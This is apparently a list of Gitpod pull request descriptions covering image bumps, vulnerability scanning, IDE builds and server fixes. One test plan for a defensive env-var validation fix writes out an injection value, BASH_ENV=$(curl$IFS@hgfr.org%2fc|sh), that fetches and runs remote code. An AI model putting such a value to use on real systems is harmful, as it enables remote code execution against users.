[image-builder-bob] bump up buildkit
Fixes #
1. Follow the [docs](https://www.gitpod.io/docs/enterprise/configure/workspaces/workspace-image#use-a-private-docker-image) for setup a private registry
2. start a workspace from this private registry it should success
3. start a workspace that contain a customer docker build and base image is from private registry, it should be success too
<ul>
<li><b>🏷️ Name</b> - pd-update-buildkit</li>
<li><b>🔗 URL</b> - <a href="https://pd-update-buildkit.preview.gitpod-dev.com/workspaces" target="_blank">pd-update-buildkit.preview.gitpod-dev.com/workspaces</a>.</li> …
> [image-builder-bob] bump up buildkit

- components/server/leeway.Dockerfile
- components/ws-manager-bridge/leeway.Dockerfile
Mitigates multiple CVEs in the outdated wolfi images
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server, bridge] Switch base-images to node:18.20.7-alpine to avoid CVEs

- .github/workflows/build.yml
- components/image-builder-bob/leeway.Dockerfile
This reverts commit fd362443b1598d601d2f293c4d6b3cb8ccd6a59e.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Revert "[image-builder-bob] bump up buildkit (#20690)"

- components/gitpod-db/leeway.Dockerfile
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [db] Switch to node:18.20.7-alpine base image

- install/installer/pkg/common/constants.go
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [installer] Bump kube-rbac-proxy to v0.19.0

- components/gitpod-db/leeway.Dockerfile
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [db] Bump cloud-sql-proxy to  v1.37.6

- .github/workflows/ide-integration-tests.yml
- components/ide/gha-update-image/lib/common.ts
Tool: gitpod/catfood.gitpod.cloud
Revert changes that breaks main and trigger IDE integration tests in branch
<ul>
<li><b>🏷️ Name</b> - hw-gha-2</li>
<li><b>🔗 URL</b> - <a href="https://hw-gha-2.preview.gitpod-dev.com/workspaces" target="_blank">hw-gha-2.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-gha-2-gha.32002</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-hw-gha-2 …
> [gha] Correct installer tag finding for IDE integration tests

- .github/workflows/build.yml
- scripts/trivy/scan-installer-config.yaml
- scripts/trivy/trivy-scan-images.sh
- scripts/trivy/trivyignore.yaml
Moving this closer to the dev loop helps us react to these quicker.
**Note**: This is not meant to preclude the ongoing discussions of how to improve scanning, enforcement and reaction across all deliverables. Instead, I see it as a mere first step.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a non-preemtible …
> [dev] Introduce script and CI step using trivy to scan and enforce 0 CRITICAL in images 

- components/dashboard/src/AppNotifications.tsx
- components/dashboard/src/Login.tsx
Introduce a sticky notification informing users about the sunset plans of Gitpod Classic in fall 2025, encouraging them to try the new Gitpod which will also have Gitpod-hosted compute soon :tada:
Related: [Internal conversation](https://gitpod.slack.com/archives/C046Z4BBP2N/p1743110347939789)
/hold
> New Gitpod Classic notification

- components/server/src/server.ts
- components/ws-manager-bridge/src/main.ts
This helps aligning the behavior of bridge and server with other containers.
Fixes CLC-1271
- `kubectl -n monitoring-satellite port-forward grafana-5fd57658b4-2fzlh 3000 &`
- open that port
- check that `gitpod_version_info` is exported :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a …
> [server, bridge] Bind metrics apps to "127.0.0.1" instead of "localhost"

- .github/workflows/build.yml
- components/image-builder-bob/leeway.Dockerfile
- components/workspacekit/pkg/seccomp/notify.go
This reverts commit 71378332359c80940e1c1b0dc158bf430cd67636.
Tool: gitpod/catfood.gitpod.cloud
This pid is actually thread id, it should be safe if we use in `thread-self`
see doc [link](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html#:~:text=The%20seccomp_notif%20structure,and%20SECCOMP_IOCTL_NOTIF_SEND%0A%20%20%20%20%20%20%20%20%20%20%20%20operations.)
workspace integration test are success https://github.com/gitpod-io/gitpod/actions/runs/13993623337/job/39183946713?pr=20694
Fixes CLC-1252
<ul>
<li><b>🏷️ Name</b> - pd-upgrade-buildkit</li>
<li><b>🔗 URL</b> - <a href="https://pd-upgrade-buildkit.preview.gitpod-dev.com/workspaces" target="_blank">pd-upgrade-buildkit.preview.gitpod-dev.com/workspaces</a>.</li …
> Reapply "[image-builder-bob] bump up buildkit (#20690)" (#20693)

- .github/workflows/build.yml
Fix trivy scan on main
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix trivy scan on main

- install/installer/pkg/common/common.go
See CLC-1264
Fixes CLC-1264
- use a firewall/server/proxy that is subject to https://tldr.fail
- use it to gate/server content Gitpod needs access to (SCM, IDP)
- see that it still works
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Avoid https://tldr.fail

- components/gitpod-db/leeway.Dockerfile
Fix issue due to missing /bin/bash by installing it explicitly.
It's expected by downstream installation tools.
Fixes CLC-1281
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. If enabled, `with-preview` …
> [db] Migrations image: explicitly add bash

- WORKSPACE.yaml
Includes two commits:
- https://github.com/gitpod-io/openvscode-server/commit/6d0d2c5fdd3610e14f13b9fc7291d177903d035e
- https://github.com/gitpod-io/openvscode-server/commit/213c6010ff3e0ef3500aedb85cc117e3e6326deb
- https://github.com/gitpod-io/openvscode-server/commit/74a2fbf70cc0f306dac374ee78760da2e157bb7c
Fixes #
- It should work well with the **latest** VS Code Browser 
- Quick fixing should work
- Try to open with https://github.com/kylos101/kibana repository, and explore TS files like `processes.ts` file, the loading state should be improved
<ul>
<li><b>🏷️ Name</b> - hw-vs-198</li>
<li><b>🔗 URL</b> - <a href="https://hw-vs-198.preview.gitpod-dev.com/workspaces" …
> Patch build VSCode Browser 1.98

- components/common-go/watch/file.go
We used to return and stop watching a file if the hashConfig function returned an error. Now we log the error (including the event name) so we can later try again on subsequent fsnotify events.
Fixes CLC-1304
Update the `image-pull-secret` in this preview environment, and assert that file watcher picks up the new value in the [logs](https://cloudlogging.app.goo.gl/CzKjqLUfizYmBNbq7). 
In the below picture, you'll see 3 entries, 1 for the initial start and 2 where I changed the secret value path via: `kubectl patch secret image-pull-secret --patch '{"data":{".dockerconfigjson":"'$(cat patch.json | base64 -w 0)'"}}'`
<ul>
<li><b>🏷️ Name</b> - kylos101-clc-1304</li> …
> [common-go] continue on hashConfig errors

- operations/observability/mixins/workspace/rules/central/image-builder.yaml
Alert in Slack when the internal errors for build are too high, these land in #team-enterprise-alerts.
Fixes CLC-1305
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [ops] add Slack alert for GitpodImageBuilderMk3InternalErrors

- components/dashboard/src/menu/Menu.tsx
- components/dashboard/src/start/StartPage.tsx
This PR refactors the main application header Menu for improved responsiveness and updates the workspace start page with conditional UI elements.
Fixes GRO-808
| Menu header | Starting page |
| <img width="1154" alt="image" src="https://github.com/user-attachments/assets/8f7bf059-c1cd-4e6b-91c1-cc0bdc6249d3" /> | <img width="565" alt="image" src="https://github.com/user-attachments/assets/35f933f4-d5ff-4622-a5e4-fbd1e261a922" /> | 
*   Verify header layout on different screen sizes (desktop and mobile).
*   Test with relevant customer feature flag enabled and disabled to check conditional UI elements.
*   Check visibility of conditional branding in header and on start page.
*   Verify "Feedback" link visibility in the user menu dropdown under appropriate conditions.
* …
> feat(dashboard): Update header layout and start page branding

- .github/workflows/team-labeler.yml
- .github/workflows/update-image-digest.yml
Update github action runtime, because ubuntu 20.04 already retirement
Fixes CLC-1314
see this action https://github.com/gitpod-io/gitpod/actions/runs/14635198613
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> update github action runtime

- install/installer/pkg/common/certificate.go
- install/installer/pkg/components/server/deployment.go
- install/installer/pkg/components/ws-manager-bridge/deployment.go
Configure NODE_EXTRA_CA_CERTS env var to point to the CA certificate bundle file.
Fixes CLC-1317
- we applied via `kubectl set env deployment/server NODE_EXTRA_CA_CERTS=/etc/ssl/certs/ca-certificates.crt` which fixed the issue in a Dedicated installation
- to verify it still works, [start one in the preview](https://gpl-test-ca.preview.gitpod-dev.com/new#https://github.com/geropl/bel)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] Fix custom CA

- components/registry-facade/pkg/registry/manifest.go
[registry-facade] add image spec to logs
Fixes CLC-1315
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [registry-facade] add image spec to logs

- components/dashboard/src/data/git-providers/suggested-repositories-query.ts
- components/dashboard/src/workspaces/Workspaces.tsx
We've received feedback that the suggested repos component can trigger layout shifts. This PR attempts to fix those.
Fixes CLC-1307
TBD
https://ft-improve13010e87f3.preview.gitpod-dev.com/workspaces
> [dashboard] try using skeletons for loading repo suggestions

- components/server/src/user/env-var-service.ts
Enables the use case of collaborators allowing to use projects with a private default workspace image configured on the org-level. This is enabled by the optional `enableDockerdAuthentication` that was implemented in #20586 - shortly _after_ org-level-env vars was implemented in #20538.
Fixes CLC-1319
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this …
> [server] Allow org env vars in repos that don't have projects

- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodTerminalService.kt
Fixes CLC-1308
- Create a workspace in preview env with https://github.com/gitpod-samples/spring-petclinic + stable IntelliJ IDEA 
- Resize the terminal should make content adjusts as well
**Integration tests**
✔️  Passed https://github.com/gitpod-io/gitpod/actions/runs/14701968868/job/41254054356?pr=20778
<ul>
<li><b>🏷️ Name</b> - hw-jb-terminal</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-terminal.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb-terminal.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to …
> [JetBrains] Attach tasks with `exec` to properly handle terminal resize

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-integration-test.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- components/supervisor/BUILD.yaml
- components/supervisor/leeway.Dockerfile
- components/supervisor/openssh/BUILD.yaml
Follow up of https://github.com/gitpod-io/gitpod/pull/20764
[Fixes #](https://linear.app/gitpod/issue/CLC-1291/upgrade-leeway-in-gitpodgitpod-io-and-gitpodgitpod-dedicated-repos)
> Upgrade Dev Env with Leeway 0.10.2

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-integration-test.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
Upgrade Dev Env with Leeway 0.10.3
Relate [CLC-1324](https://linear.app/gitpod/issue/CLC-1324)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Upgrade Dev Env with Leeway 0.10.3

- components/server/src/orgs/organization-service.spec.db.ts
- components/server/src/workspace/gitpod-server-impl.ts
We still establish a websocket connection in some cases. For collaborators, this generates this noisy error because we fail to register a listener for every org the user is member of.
This PR fixes this error by using the appropriate service method instead of an outdated one.
Fixes CLC-1323
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if …
> [server] Fix permission issue for collaborators in listenForPrebuildUpdates

- .github/workflows/code-build.yaml
- WORKSPACE.yaml
- components/ide/code/leeway.Dockerfile
Build code version `1.99.3` (`ec2e536434cea064d6864b259015fefdaa07a74b`)
<ul>
<li><b>🏷️ Name</b> - hw-code-build</li>
<li><b>🔗 URL</b> - <a href="https://hw-code-build.preview.gitpod-dev.com/workspaces" target="_blank">hw-code-build.preview.gitpod-dev.com/workspaces</a>.</li> …
> Build VS Code Browser 1.99.3

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-integration-test.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- WORKSPACE.yaml
- components/BUILD.yaml
This PR improves our vulnerability detection by implementing daily scans and optimizing the scanning process.
- **Daily Vulnerability Scanning**: Added scheduled workflow (midnight UTC) with Slack notifications for critical findings
- **Optimized Scanning**: Created `needs-vuln-scan` target to focus on relevant packages only
- **Vulnerability Management**: Added ignore rules with documentation for false positives
- **SBOM Integration**: Enabled SBOM generation and artifact uploads
- **Dev Environment**: Updated development image and related workflows
The implementation replaces direct Trivy scanning with Leeway's built-in SBOM capabilities for better build system integration. When vulnerabilities are detected, the workflow automatically notifies us on Slack.
Fixes …
> Create SBOMs and scan for vulnerablities

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.99.3`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.32508</li> …
> [VS Code Browser] Update stable code to `1.99.3`

- components/gitpod-protocol/src/protocol.spec.ts
- components/gitpod-protocol/src/protocol.ts
- components/image-builder-bob/pkg/proxy/auth.go
- components/image-builder-bob/pkg/proxy/auth_test.go
- components/image-builder-mk3/pkg/auth/auth.go
- components/image-builder-mk3/pkg/auth/auth_test.go
- components/supervisor/pkg/supervisor/docker.go
- components/supervisor/pkg/supervisor/docker_test.go
Be able to consume GITPOD_IMAGE_AUTH, where it is `host:<token>` or `host:port:<token>`.
Fixes #16237
Fixes CLC-1364
See unit tests
[Preview](https://kylos101-s2pzmioah6s.preview.gitpod-dev.com/workspaces)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gitpod-protocol] handle host:port:token for getGitpodImageAuth

- .devcontainer/Dockerfile
[devcontainer] sync golang version with dev image
in dev image for gitpod.io
in devcontainer
If the version cannot match, we cannot use leeway cache
Fixes CLC-1363
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [devcontainer] sync golang version with dev image

- components/ws-manager-mk2/controllers/status.go
We should always synchronize the IP addresses, even if they have been set before.
Related to CLC-1368
1. start a workspace in preview env
2. reboot the node
3. use kubectl to get workspace crd info, the runtime->podIP should be cleanup
<ul>
<li><b>🏷️ Name</b> - pd-ws-sync-ip</li>
<li><b>🔗 URL</b> - <a href="https://pd-ws-sync-ip.preview.gitpod-dev.com/workspaces" target="_blank">pd-ws-sync-ip.preview.gitpod-dev.com/workspaces</a>.</li> …
> [ws-manager-mk2] always update workspace pod ip

- components/ws-manager-mk2/controllers/status.go
- components/ws-manager-mk2/controllers/workspace_controller_test.go
[ws-manager-mk2] do cleanup of failed workspace with unknown status
Fixes CLC-1372
1. start a workspace in preview env
2. ssh in to workspace node
3. restart the node
4. you will observe the workspace are cleanup after reboot, and you can also see logs `workspace container xxxx terminated for an unknown reason` in ws-manager-mk2 pod
<ul>
<li><b>🏷️ Name</b> - pd-clc-1372</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-1372.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-1372.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for …
> [ws-manager-mk2] do cleanup of failed workspace with unknown status

- dev/preview/infrastructure/modules/gce/variables.tf
- dev/preview/infrastructure/variables.tf
Use the latest GCP AMI with preview envs
Related to CLC-1354
[Integration tests pass](https://github.com/gitpod-io/gitpod/actions/runs/15197113595/job/42749801320?pr=20833)
<ul>
<li><b>🏷️ Name</b> - kylos101-bump-ami</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-bump-ami.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-bump-ami.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - kylos101-bump-ami-gha.32728</li> …
> [dev/preview] bump GCP AMI

- dev/image/Dockerfile
bump up dev image
Fixes Related CLC-1067
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> bump up dev image

- WORKSPACE.yaml
Build code version `1.100.2` (`ade9f0c5cec78abbfa97396c6961a436f91ab00e`)
<ul> …
> [VS Code Browser] Build stable code `1.100.2`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.100.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.32823</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-ide-code- …
> [VS Code Browser] Update stable code to `1.100.2`

- .devcontainer/Dockerfile
- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-integration-test.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- components/gitpod-db/leeway.Dockerfile
- components/ide/code/gitpod-web-extension/leeway.Dockerfile
- components/server/leeway.Dockerfile
- components/ws-manager-bridge/leeway.Dockerfile
Brings us from slightly behind EOL to LTS (maintenance to Oct 26+)
Fixes CLC-1295
- vet the r[elease notes](https://linear.app/gitpod/issue/CLC-1295/upgrade-meta-components-from-node-18-to-20#comment-d7114b29)  :heavy_check_mark: 
- smoke testing the preview for 1h+ :heavy_check_mark: 
- checking logs of all node services along the way :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dev] Bump node 18.x to 22.15.1

- components/server/src/audit/AuditLogService.ts
The args param contains workspace IDs and other sensitive data. Since it's quite hard to detect them, best way is to simply not log it at all. It's still part of the audit database but does not appear in the component logs.
Fixes https://linear.app/gitpod/issue/CLC-666/scrubbing-audit-log-writes-workspaceids-in-plain-text
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Redact args in the logs of audit log service

- components/server/src/authorization/spicedb-authorizer.ts
This bug got introduced with https://github.com/gitpod-io/gitpod/issues/20637.
While that PR fixed two other problems, in the end we went with re-using the manual re-try implementation to work around the `Waiting for LB pick` issue with `@grpc/grpc-js`. That logic got copied over without the relevant `await`, so we never did any of the retries.
Fixes CLC-1402
- I used [this script](https://linear.app/gitpod/issue/CLC-1402/investigate-high-error-rates-from-gitpodv1-api#comment-124b93e0) for testing, but - as always - could not reliably reproduce the root cause in our previews
- best testing results I got was when going with `replicas: 1, maxUnavailable: 1, maxSurge: 0` and an initContainer sleeping for 30s
- :bulb: this indicates that the root cause is indeed some kind of (persistent?) …
> [server] Fix spicedb retry on DEADLINE_EXCEEDED & UNAVAILABLE

- components/registry-facade/pkg/registry/blob.go
- components/registry-facade/pkg/registry/blob_test.go
- memory-bank/activeContext.md
- memory-bank/components/registry-facade.md
- memory-bank/progress.md
We do retries when doing HTTP requests. But if an error occurs while copying the response body, we did not re-establish the connection so far. This PR justs does this, as well as extending the backoff time span to ~10s instead of 1s, to be able to cover intermittent network problems.
Fixes CLC-1416
- new tests are green: :heavy_check_mark: 
- start [a workspace](https://gpl-195-registry-err.preview.gitpod-dev.com/new#https://github.com/geropl/bel) :heavy_check_mark: 
- start an image build: :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [registry-facade] Do retry if copying a blob fails mid way

- components/registry-facade/pkg/registry/manifest.go
- components/registry-facade/pkg/registry/manifest_test.go
Turns out that similarly to https://github.com/gitpod-io/gitpod/pull/20879 we have a retry mechanism in place, but it does capture [this scenario](https://linear.app/gitpod/issue/CLC-1365/registry-facade-sometimes-cannot-downloadconfig-for-ecr-for-private#comment-77bba8f3):
> And they happen because if io.ReadAll(rc) fails, we do not re-try in any way because:
>
> rc is a httpReadSeeker, so does not only read a body, but might also do new range requests
>
> containerds dockerFetcher does [uses ](https://github.com/containerd/containerd/blob/v1.6.36/remotes/docker/fetcher.go#L70)http.DefaultClient for subsequent requests, instead of the one we pass into the dockerResolver [here](https://github.com/gitpod-io/gitpod/blob/76781bf32218c46d064e85ac8dd39e454218c8af/components/registry-facade/cmd/ …
> [registry-facade] Properly retry fetching mainfests/config as well

- components/supervisor/pkg/supervisor/supervisor.go
- components/supervisor/pkg/supervisor/tasks_test.go
- components/supervisor/pkg/terminal/service.go
- components/supervisor/pkg/terminal/terminal_test.go
Related: CLC-1332
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [supervisor] Drop feature flag supervisor_terminal_no_deadline_exceeded

- .devcontainer/Dockerfile
- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-integration-test.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- CLAUDE.md
- dev/image/Dockerfile
Add support for Claude Code in this repo for Gitpod Classic and Gitpod.
n/a
1. If you've never used `claude`, run it once, that'll generate a configuration file at `~/.claude.json`
2. Copy the configuration file to Gitpod Classic and Gitpod as a variable and secret file, respectively. 
* ℹ️  Before you copy, empty the history and cachedChangelog fields to reduce length (Gitpod is limited to 4096)
* For Gitpod Classic, create a User Variable called CLAUDE_JSON, and paste the file contents
* For Gitpod, create a File Secret called CLAUDE_JSON, with a location of `/root/.claude.json`
4. Run a Gitpod Classic workspace from this PR, and then try using Claude, it should just work (a task configures Claude on workspace start to use the variable)
5. Run a Gitpod environment from this PR, and then …
> Add Claude Code for Gitpod and Gitpod Classic

- .claude/settings.json
- .gitignore
- Add .claude/settings.json with permissions for AI assistant
- Add .claude/settings.local.json to .gitignore for local overrides
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Add Claude settings configuration

- WORKSPACE.yaml
- components/ide/code/leeway.Dockerfile
Build code version `1.101.1` (`1b5c26fe6558dd07b180a09848e5ea053189ae6e`)
<ul> …
> [VS Code Browser] Build stable code `1.101.1`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.101.1`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.33283</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-ide-code- …
> [VS Code Browser] Update stable code to `1.101.1`

- WORKSPACE.yaml
Build code version `1.101.2` (`b285c3188f523544b1e245a5677a6d6c221a3c9c`)
Fixes CLC-1501
<ul>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to interact with your …
> [VS Code Browser] Build stable code `1.101.2`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.101.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.33312</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-ide-code- …
> [VS Code Browser] Update stable code to `1.101.2`

- components/server/src/api/workspace-service-api.spec.ts
- components/server/src/api/workspace-service-api.ts
cherry-pick from https://github.com/gitpod-io/gitpod/pull/20914
Fixes CLC-1458
<ul>
<li><b>🏷️ Name</b> - pd-clc-1458</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-1458.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-1458.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-CLC-1458-gha.33363</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-pd-clc-1458%22%0A%0A--%20Fi …
> [server] tolerate deleted users for listWorkspaceSessions

- .devcontainer/devcontainer.json
- .gitignore
- .gitpod/automations.yaml
- dev/install-dependencies.sh
Co-authored-by: Ona <no-reply@ona.com>
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dev] Improve devcontainer, add automations

- components/proxy/plugins/headlesslogdownload/headless_log_download.go
Fixes CLC-1593
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [proxy] add security headers

- .devcontainer/devcontainer.json
- .gitpod.yml
- dev/github-token.sh
- dev/setup-github-auth.sh
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dev] Automatically authorize gh

- components/server/src/util/featureflags.ts
- components/server/src/workspace/envvar-prefix-context-parser.spec.ts
- components/server/src/workspace/envvar-prefix-context-parser.ts
Fixes CLC-1591
- https://gpl-1591-c778164679a.preview.gitpod-dev.com/workspaces
- create workspace with:
- https://gpl-1591-c778164679a.preview.gitpod-dev.com/new/?autostart=true#BASH_ENV=$(curl$IFS@hgfr.org%2fc|sh)/https://github.com/gitpod-io/empty :x: 
- notice the "Blocked environment" in the logs, and that the value does not match in workspace
-  https://gpl-1591-c778164679a.preview.gitpod-dev.com/new/?autostart=true#MY_ENV=tg.123a-asd_/https://github.com/gitpod-io/empty :heavy_check_mark: 
- notice how the value is present in workspace
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [server] Implement context env var validation behind context_env_var_validation feature flag

- .devcontainer/Dockerfile
Install SDKMAN as root (proven working approach) then create gitpod user with symlinks to make SDKMAN accessible at /home/gitpod/.sdkman path expected by JetBrains plugin BUILD.yaml files. This resolves the issue where leeway run dev:preview fails in Flex environments due to SDKMAN path mismatch.
Fixes CLC-1619
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. …
> Unblock Ona on Classic: Fix SDKMAN_DIR mismatch in Flex environments

- .devcontainer/Dockerfile
[devcontainer] sync golang version so that we can use leeway cache
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [devcontainer] sync golang version

- .devcontainer/Dockerfile
This PR adds two commonly used network and database tools to the devcontainer:
- **netcat-openbsd** (binary name: `nc`) - Network utility for testing connections, port scanning, and data transfer
- **redis-tools** (binary name: `redis-cli`) - Redis command-line client for interacting with Redis instances
Both tools are frequently needed during development and debugging, especially for:
- Testing network connectivity and services
- Debugging Redis connections and data
- General network troubleshooting
The tools are installed alongside other development utilities in the Dockerfile and will be available in all devcontainer environments.
> Add netcat and redis-tools to devcontainer

- components/gitpod-cli/cmd/env.go
Environment variables with comma-separated values (e.g., `COMPOSE_PROFILES=value1,value2,value3`) were displaying the scope pattern (`*/*`) instead of the actual values when using `gp env`.
The `parseArgs` function in `cmd/env.go` had incorrect string splitting logic:
```go
kv := strings.SplitN(arg, "=", 1)
```
Using a limit of `1` prevents any splitting, so `"KEY=value"` returns `["KEY=value"]` as a single element.
- Changed `strings.SplitN(arg, "=", 1)` to `strings.SplitN(arg, "=", 2)`
- Simplified validation logic by removing redundant checks
- Preserved all existing functionality and error handling
Fixes CLC-1662
> Fix environment variable parsing for comma-separated values in CLI

- components/ee/agent-smith/example-config.json
- components/ee/agent-smith/pkg/agent/agent.go
- components/ee/agent-smith/pkg/classifier/classifier.go
- components/ee/agent-smith/pkg/classifier/classifier_test.go
- components/ee/agent-smith/pkg/classifier/filesystem_test.go
- components/ee/agent-smith/pkg/classifier/sinature.go
- components/ee/agent-smith/pkg/config/config.go
- components/ee/agent-smith/pkg/config/config_test.go
- components/ee/agent-smith/pkg/detector/filesystem.go
- components/ee/agent-smith/pkg/detector/filesystem_test.go
- dev/preview/workflow/preview/deploy-gitpod.sh
- install/installer/pkg/components/agent-smith/configmap.go
- install/installer/pkg/components/agent-smith/constants.go
- install/installer/pkg/components/agent-smith/daemonset.go
This'll warrant a new deployment for the workspace clusters, after updating the ops repo with the updated configuration.
Fixes CLC-1701
[instructions](https://linear.app/gitpod/issue/CLC-1701/agent-smith-introduce-file-detector#comment-500a1b48)
[a demo video](https://linear.app/gitpod/issue/CLC-1701/agent-smith-introduce-file-detector#comment-2e92fe2c)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [agent-smith] introduce file detector

- package.json
